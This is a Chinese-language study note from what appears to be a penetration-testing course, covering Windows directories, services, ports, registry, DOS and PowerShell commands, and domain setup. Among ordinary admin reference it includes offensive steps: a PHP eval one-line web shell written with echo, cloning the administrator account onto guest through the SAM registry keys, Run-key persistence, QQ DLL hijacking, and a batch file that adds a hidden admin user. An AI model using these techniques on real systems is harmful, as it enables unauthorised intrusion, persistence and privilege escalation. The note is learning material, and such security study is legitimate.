02windows基礎操做

我學到了一下幾點

Windows系統目錄結構與滲透的做用
常見Windows的服務詳解
Windows端口詳解
經常使用的Windows註冊表詳解
hacker DOS命令詳解（net user / type /md /rd/ dir /cd /net use copy、批處理 等）
利用dos命令製做開機病毒
Windows性能優化詳解
Windows手動查找木馬並清理病毒
POWERSHELL（ps1腳本使用，經常使用滲透命令講解，powershell在內網滲透中的做用）
windows 域環境（域控搭建配置，域用戶組權限分析，域網絡工做原理講解，域策略配置使用等）

1.系統目錄，服務，端口，註冊表
2.經常使用的DOS命令
3.POWERSHELL使用
4.域控環境搭建配置

主要是對系統目錄的瞭解

之後的流程：漏洞---後臺---getshell---執行命令操做---提權---內網 dos命令在執行命令日後用到的多。

powershell,nishang,empire,msf生成ps1
常常用到無文件攻擊：不會往電腦裏上傳文件，經過遠程的服務器調用生成的ps腳本，加載到內存去運行，就會出現一個會話，對msf或者控制機上操做。無文件攻擊是沒法溯源的。 只有用bypass防禦， 360等安全工具攔截也能夠過。

 

域控環境搭建 成員pc加入域網絡

01.系統目錄（安裝完成後08C盤）
windows：是windows系統的安裝目錄，並非程序目錄，該目錄存放系統文件資料，不要隨意去改動
windows下重要目錄
System32:屬於系統的配置文件，
cmd.exe，
sethc.exe調用粘貼，
config/SAM：SAM文件裏有系統的用戶名密碼。忘記密碼了能夠用pe去清理SAM文件，抹掉密碼
drivers/etc/hosts：hosts文件解析優先級是高於DNS的。能夠釣魚，欺騙，修改DNS文件。繞過服務器軟件激活驗證

Program Files 64位程序目錄
Program Files (x86) 32位程序目錄
Perflogs :存放日記記錄（不是系統日誌）
ProgramData:存放系統臨時生成的文件夾和數據（隱藏目錄）：rpp蠕蟲病毒會感染此目錄能夠用殺毒軟件去着重掃描下這個目錄
用戶目錄：從3389進來會生成一個登錄用戶的文件夾，文件及裏會配置一些信息。用戶登陸可查看管理員一小部分桌面。最好用管理員登陸查看桌面可能會有idc帳號密碼信息，數據庫臨時修改文件等。以及被黑客留下的遠控，礦機等。

02.計算機服務
服務器有兩種服務：①本地服務②網絡服務
①本地服務：隨便開個軟件也稱本地服務
②網絡服務：能夠經過ip給互聯網提供服務的叫網絡服務

滲透測試黑客的目的是拿到至高權限，拿到權限的途徑有哪些呢？

黑客經過網絡訪問服務器首先是訪問的網絡服務

A服務器可能開通的服務：web服務，數據庫服務，FTP服務，3389服務，1433服務
其中web服務漏洞多，搞得花樣也會多概率機會大，例如owasp top10的漏洞。經過web服務區提權，拿到更多權限

網絡服務漏洞（不包括WEB）：
1.爆破(已知帳號windows:administrator,linux:root)爆破密碼便可，也能拿到最高權限
2.漏洞利用rdp,sib每隔一段時間都會出現相應漏洞（exp配合msf）進行漏洞利用 也能拿到權限
3.欺騙（dns欺騙，中間人攻擊） 也能拿到權限
4.釣魚（web釣魚，垃圾郵件，nishang提權釣魚）也能拿到權限

web服務
dns服務：域名解析ip，ip反向解析域名
dhcp服務：網端口有一個分發ip服務器
郵件服務：
telnet服務：把本身的cmd經過遠程調用，也能夠用telnei去測試他的端口開放狀況
ftp服務：上傳下載
smb服務445：web連接和客戶端與服務器通訊
rdp服務：遠程桌面

計算機端口：
計算機端口做用就是用來區分服務的，計算機通訊是靠ip的
端口在默認狀況下是不能夠重複使用
端口範圍1-65535

信息收集分析：
訪問hao123.com
打開檢查元素
Network---
找到www.hao123.com點擊
點擊Headers
找到請求和響應包
apache
探測FTP:
ftp ip地址

服務器版本系統分析：
iis7/7.8 08
iis8/8.5 12
iis10 2016

常見的端口

HTTP協議代理服務器經常使用端口號：80/8080/3128/8081/9080
https/443
FTP(文件傳輸)協議代理服務器經常使用端口號：21
Telnet(遠程登陸)協議代理服務器經常使用端口：23
TFTP（Trivial File Transfer Protocol）默認端口號爲69/udp
SSH(安全登陸)。SCP（文件傳輸），端口重定向，默認的端口號爲22/tcp
SMTP Simple Mail Transfer Protocol (E-mail),默認端口號爲25/tcp木馬Antigen、Email
Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個端口）；
POP3 Post Office Protocol (E-mail) ，默認的端口號爲110/tcp；
TOMCAT，默認的端口號爲8080；
WIN2003遠程登錄，默認的端口號爲3389；
Oracle 數據庫，默認的端口號爲1521；
MS SQL*SERVER數據庫server，默認的端口號爲1433/tcp 1433/udp；
QQ，默認的端口號爲1080/udp

發現未知端口怎麼辦？
1.baidu
2.nmap 識別端口指紋看服務
3.加載ip或者域名後面看下是否是網站
4.測試是否是3389由於3389會常常被改掉

註冊表:
快速打開註冊表：regedit
第三個：HKEY_LOCAL_MACHINE用的比較多
註冊表克隆帳號：
打開第三個表---SAM--SAM(右鍵添加權限Administrators徹底控制讀取)---刷新---Domains
---Users---查看Names裏的aminisrxxx(管理員)採用的0x1f4十六進制---在找到000001F4雙擊「F」複製前4排之後的值，打開000001F5(來賓)的"F"值，粘貼到相同位置。
再給來賓帳號設置個密碼，這樣，來賓帳號就等於管理員帳號有了同樣的權限

開啓啓動（能夠寫入東西）
註冊表HKEY_LOCAL_MACHINE---Microsoft---windows---CurrentVersion---Run---
Run---新建---字符串值--填寫你要開機的啓動項，比其餘地方稍微隱蔽些，開機的軟件也可能調用這個表

大多使用的黑方法
dll劫持，好比qq有不少dll文件，執着一個dll特換掉qq的dll這樣每次打開qq就會生成一個shell

DOS命令

ping:

簡單的路由追蹤：tracert 目標網址
1 1 ms 2 ms 3ms 192.168.1.1 本身路由器
2 2 2 1 100.64.0.1 運用商的
3 3ms 4 3 58.42.150.13

tracert的做用

c段來講，假設14.215.177.1---14.215.177.254，若是目標的路由追中和c段裏站的路由追中都是同樣的表明都在一個機房裏。倒數第二個看也能夠內網滲透會用到
好比tracert 14.215.177.1 返回的路由數值都是同樣證實都是一個機房的
tracert 14.215.177.2

什麼類型的站點可能會在一個c段？
大學，政府，醫院，機構等等一系列

ip:
ipconfig:主要查看ip和網關的
ipconfig /all：看的更全面詳細
ipconfig /release釋放ip
ipconfig /renew從新獲取ip
ipconfig /flushdns 清空DNS緩存
systeminfo 查看系統信息以及補丁。提權必備
arp -a 主要查看本地緩存表 局域網通訊是靠ARP緩存表裏的mac地址 能夠看看局域網和你交互的主機
net view 查看局域網裏其餘計算機名稱

shutdown -s -t 180 -c "你還有180秒關機"
shutdown -a 取消關機
shutdown -r -t 180 -c "你還有180秒重啓"

dir:查看目錄下有哪些文件目錄，其中顯示的.表明隱藏目錄

cd:切換目錄
cd\ 到c盤根目錄
d: 進入D盤
md 建立目錄 例如：md test 在用dir查看
rd 刪除目錄 例如 rd test 在用dir查看

copy con 建立文件 例如：copy con 123.txt copy con d:\123.txt (批處理也能夠作)
start 圖形化查看文件 例如：start 123.txt start www.baidu.com statr TOOS\TOOS\fanghan
type 命令行查看文件 例如：type 123.txt
del 刪除文件 例如：del 123.txt
rd /S 刪除文件夾，文件夾裏有內容例如 rd /S test.txt
ren 原文件名 新文件名 重命名文件名

copy 複製文件 例如 copy 123.txt d:\
move 移動 例如 move 124.txt .

重點：內網滲透會用到
net share 查看共享
net share c$ /del 刪除c盤共享
net use k:\\192.168.1.1\c$
net use k:\\192.168.1.1\c$ /del
net use k:/del刪除連接

能夠遠程執行命令以及批處理之類的

net time \\192.168.1.1

net start 查看開啓了哪些服務
net start 服務名　 開啓服務；(如:net start telnet， net start schedule)
net stop 服務名 中止某服務 （若是服務中間有空格最好用引號引發來）

net user 用戶名　密碼　/add 創建用戶
net user 用戶名 查看詳細服務，詳細時間等
net user guest /active:yes 激活guest用戶 net user 查看有哪些用戶
net user 賬戶名 查看賬戶的屬性
net locaLGroup 查看組 每一個組的功能點也是不同的
重點正常狀況下遠程登陸必須是管理員 但若是把普通用戶也添加到*Remote Desktop Users 也能夠登陸
重點，何時用，若是sqlserver拿到了sa權限能夠遠程執行命令，由於權限是system權限，能夠建立用戶，可是服務器卻有個安全狗。若是在建立net user 1 1 /add安全狗沒有攔截的話，就把1這個用戶添加到*Remote Desktop Users組裏，在經過3389登陸，可是你不是最高權限，這時候，你把system的全部C,D盤的權限進行降權，從理解層面的意思上你的1已是管理員權限了，變相提權。本身上不去，就把身邊的人拉下來。

net locaLGroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具備管理員權限,注意：administrator後加s用複數
net user guest 12345 用guest用戶登錄後用將密碼改成12345
net password 密碼 更改系統登錄密碼
net share 查看本地開啓的共享
net share ipc$ 開啓ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享

Tasklist 查看進程
Taskkill /im qq.exe /f 結束進程 切記並非全部進程都得結束，即便最高權限。若是是system能夠中止殺軟服務，但沒法結束進程
Tracert 追蹤路由
Echo 「」命令行寫入文件 在命令執行以及導入shell時候用的較多。
例如 echo "123132132" > 12331.txt，在查看type 12331.txt
重點：echo重點用在一句話，如：echo ^<?php @eval($_POST[a]);?^> > a.php ^是用來區分>的。

Query user 查看登陸用戶 實際狀況你查看下真正的管理員有沒有登陸，登陸的話就不要亂操做。

Msg user 「hello」 與其餘系統帳號聊天

批處理文件是dos命令的組合文件， 寫在批處理文件的命令會被逐一執行。 後綴名名.bat
新建批處理文件
新建一個文本文檔保存時把後綴名改成bat
也可使用命令 copy con 123.bat
net user cracer 123123 /add
net localgroup administrator cracer /add
Ctrl+z
回車

POWERSHELL
在08之後的服務器裏會有，03是沒有的
如何運行程序、腳本和已有的軟件 在系統路徑下運行程序、腳本、批處理文件或者其它可執行文件，能夠直接輸入文件名運行。好比我把一個Test.cmd文件放在了」C:\Windows\System32」下 若是文件名字或路徑中有空格，須要用（'）引號將命令擴起來，同時在前面加上符號（&） 要運行當前目錄下的命令，須要文件名前加.\
除了支持傳統的Windows可執行文件，PowerShell還推出了一個功能強大的新的命令叫作cmdlet。全部的cmdlet命令規則都遵循動詞-名詞這種語法結構，如Get-Command、Get-Content等，以下Get-Command命令意思是獲取包含Process的全部命令集合：

Get-command 獲取命令
Get-help get-service 獲取命令使用說明
獲取PowerShell版本信息 Get-Host或$PSVersionTable
獲取當前PowerShell環境包含的Module ，Get-Module
Get-server 獲取計算機服務
POWERSHELL只是運行軟件要用的，有的時候不一樣模式下是沒法運行的好比：
echo "heloo fanghan" > a.ps1
.\a.ps1 會報錯
Gte-Executionpolicy 查看模式， Restricted沒法運行腳本文件

設置只模式策略值：
①Set-Executionpolicy
②Executionpolicy:unrestricted
③Y
④在運行腳本

也可用bapss來繞過執行策略

域環境配置

域控制器
域控制器中包含了由這個域的帳戶、密碼、屬於這個域的計算機等信息構成的數據庫。當電腦聯入網絡時，域控制器首先要鑑別這臺電腦是不是屬於這個域的，用戶使用的登陸帳號是否存在、密碼是否正確。若是以上信息有同樣不正確，那麼域控制器就會拒絕這個用戶從這臺電腦登陸。不能登陸，用戶就不能訪問服務器上有權限保護的資源，他只能以對等網用戶的方式訪問Windows共享出來的資源，這樣就在必定程度上保護了網絡上的資源。


第一步：好比在08搭建域，首先要有一個靜態IP，不能要動態,須要DNS的配置。，域控不能換ip，因此在搭建DNS最好也同樣
第二步： ncpa.cpl---本地鏈接屬性---internet協議版本ipv4---使用下面地址 192.168.194.138，DNS:192.168.194.138
第三部：運行裏輸入dcpromo 打開了後下一步---在新林中建新域---起名fanghan.com---級別2008 R2---下一步---yes---還原密碼123.com---下一步等待安裝---自動重啓
第四部：重啓輸入密碼123.com----改密碼1234.com---稍後詢問---肯定

第五步：03加入域，只須要設置一個dns
第六步：03下運行 ncpa.cpl---本地鏈接解析到域名便可---屬性---tcpip---DNS--192.168.194.138---肯定---打開了防火牆，記得關閉
第七步：若是解析不了可能有緩存---開始---個人電腦屬性---計算機名---更改---域---域名---肯定---輸入08帳號密碼administrator 1234.com 會出現歡迎你加入---肯定重啓

第八步：08下給03建立域用戶 net uesr xy 123.com /add 03重啓後，用戶名選項，使用域建立的用戶名登陸